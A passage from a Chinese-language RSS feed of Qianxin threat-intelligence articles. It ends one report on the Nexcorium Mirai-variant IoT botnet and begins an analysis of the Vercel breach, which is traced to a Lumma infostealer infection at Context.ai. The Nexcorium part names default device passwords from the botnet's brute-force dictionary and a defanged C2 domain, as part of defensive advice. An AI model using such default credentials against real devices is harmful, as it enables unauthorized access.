16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">暴力破解威胁</span>：Nexcorium内置的密码字典包含&#34;D-Link&#34;、&#34;Zte521&#34;、&#34;Zhongxing&#34;等国内常见设备默认凭据，对国内物联网环境构成直接威胁。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">防护建议</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">针对本次攻击活动，奇安信安全专家建议采取以下防护措施：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">漏洞修补层面</span></strong><span leaf="">：优先排查TBK DVR设备（DVR-4104、DVR-4216），确认设备固件版本并及时更新。对于已停止维护的设备，建议更换为持续获得安全更新的新型号。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">凭据管理层面</span></strong><span leaf="">：强制变更所有物联网设备的默认密码，禁止使用字典内的弱密码。对于无法修改密码的老旧设备，应限制其网络暴露面，隔离至独立网段并关闭Telnet服务。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">网络防御层面</span></strong><span leaf="">：在网络边界部署抗DDoS设备，监控异常物联网设备外连行为。关注C2域名</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">r3brqw3d[.]b0ats[.]top</span></strong><span leaf="">的DNS解析日志，排查内网受控主机。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">检测响应层面</span></strong><span leaf="">：部署物联网安全态势感知平台，监控设备行为异常。建立物联网设备资产台账，持续跟踪设备运行状态和安全告警。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">关联威胁追踪</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Fortinet FortiGuard Labs在同一时期还监测到针对TP-Link TL-WR940N、TL-WR740N、TL-WR841N等生命周期终止（EoL）路由器的CVE-2023-33538漏洞自动化扫描活动。成功利用后部署的恶意软件包含&#34;Condi&#34;字符串引用，具备自我更新和充当Web服务器传播感染的能力。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心将持续追踪Nexus Team的活动轨迹及其关联的物联网僵尸网络生态，适时更新威胁评估。</span></p><hr style="overflow-wrap: break-word;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 0.4em;margin: 1.5em 0px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"/><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">参考来源</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">[1].<a href="https://hackread.com/mirai-variant-nexcorium-dvr-devices-ddos-attacks/" target="_blank">https://hackread.com/mirai-variant-nexcorium-dvr-devices-ddos-attacks/</a></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;overflow-wrap: break-word; margin: 1.5em 8px; letter-spacing: 0.1em; color: rgb(43, 48, 59); word-break: break-all; hyphens: auto; font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;&#34;},&#34;namespaceURI&#34;:&#34;&#34;}]">[2].</span><span leaf=""><a href="https://www.fortinet.com/blog/threat-research/nexcorium-a-mirai-variant-exploiting-dvr-devices" target="_blank">https://www.fortinet.com/blog/threat-research/nexcorium-a-mirai-variant-exploiting-dvr-devices</a></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;overflow-wrap: break-word; margin: 1.5em 8px; letter-spacing: 0.1em; color: rgb(43, 48, 59); word-break: break-all; hyphens: auto; font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;&#34;},&#34;namespaceURI&#34;:&#34;&#34;}]">[3].</span><span leaf=""><a href="https://unit42.paloaltonetworks.com/mirai-variant-nexcorium/" target="_blank">https://unit42.paloaltonetworks.com/mirai-variant-nexcorium/</a></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;overflow-wrap: break-word; margin: 1.5em 8px; letter-spacing: 0.1em; color: rgb(43, 48, 59); word-break: break-all; hyphens: auto; font-family: -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;&#34;},&#34;namespaceURI&#34;:&#34;&#34;}]">[4].</span><span leaf=""><a href="https://securityaffairs.com/177177/malware/mirai-nexcorium-tbk-dvr.html" target="_blank">https://securityaffairs.com/177177/malware/mirai-nexcorium-tbk-dvr.html</a></span></p><div style="font-size: 15px;letter-spacing: 1px;line-height: 1.75;padding-left: 0px;padding-right: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="will-change: transform;box-sizing: border-box;"><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="gif" data-w="480" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034833" src="https://wechat2rss.xlab.app/img-proxy/?k=6eeb28cc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq86FoiaYhJd3jMu3QtkkrWIrRdVJPxnpIfJo4Aqhy4hqY5BldKdoia18j8w4JjQUwIuflAUpjbTMzuiaAdibPlLylZpZueibmHxoEXg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.1</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=614906f3&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518497%26idx%3D1%26sn%3D6c8168f317a01d94b67558c6c18cbd5a">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 22 Apr 2026 10:01:00 +0800</pubDate>
    </item>
    <item>
      <title>Vercel供应链攻击事件深度分析：第三方AI工具成为企业安全突破口</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518496&amp;idx=1&amp;sn=0c47ed4847403380fdfe3a8f80103b05</link>
      <description>Vercel内部系统遭未授权访问事件的根源是第三方AI工具Context.ai的一名员工于2026年2月感染Lumma信息窃取器，被窃取了包括Google Workspace在内的多项服务凭据，其中部分凭据关联Vercel管理权限，随后ShinyHunters组织在BreachForums上声称出售相关数据。</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-04-21 10:04</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=8b05ad25&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq8amjdKC3lKNfntbVWHyWGNnAINOrxibkSv1uHiarcXc36HfFmRgGoaJDROQZT2bEibOS5dywh1GyAGKMo14qZibt0yIPtqB9s2EIs%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>Vercel内部系统遭未授权访问事件的根源是第三方AI工具Context.ai的一名员工于2026年2月感染Lumma信息窃取器，被窃取了包括Google Workspace在内的多项服务凭据，其中部分凭据关联Vercel管理权限，随后ShinyHunters组织在BreachForums上声称出售相关数据。</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">事件概述</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2026年4月19日，全球主流云部署平台Vercel发布官方安全公告，披露其内部系统遭受未授权访问。初步调查显示，攻击者通过攻陷一个拥有数百名用户的第三方AI工具（后确认为Context.ai）的Google Workspace OAuth应用程序，成功突破Vercel安全边界，获得内部系统访问权限。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">这并非一次简单的凭证泄露事件。随着多源情报的交叉验证，此次攻击的真正源头是一名Context.ai员工于2026年2月感染了Lumma信息窃取器。该员工在受感染设备上搜索并下载Roblox游戏作弊程序时，触发了典型的信息窃取器传播链。恶意软件成功窃取了包括Google Workspace、Supabase、Datadog和Authkit在内的多项企业服务凭据，其中部分凭据直接关联Vercel管理权限。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">威胁行为组织ShinyHunters随后在BreachForums平台发帖，声称以200万美元出售包含内部数据库、访问密钥、源代码、员工账户、API密钥、NPM令牌和GitHub令牌等数据，并提供约580条员工数据记录作为泄露凭证。Vercel CEO Rauch公开表示攻击者“高度复杂”，并指出攻击者可能利用AI能力加速入侵进程。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击链路与技术分析</span></h2><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">初始渗透路径</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击链路呈现典型的“第三方→目标”的供应链攻击模式，具体可分为三个阶段：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第一阶段：信息窃取器感染（2026年2月）</span></strong></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击者通过黑产渠道获取Lumma信息窃取器，并通过游戏作弊程序捆绑方式投递。Context.ai一名员工在日常工作设备上搜索并下载Roblox作弊程序时，成功触发感染链。Lumma作为活跃的maas（恶意软件即服务）产品，具备完整的日志回传、屏幕截图、浏览器凭据抓取和加密货币钱包扫描能力。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">第二阶段：凭据窃取与武器化</span></strong></p><p style="overflow-wrap: break-word;margin: 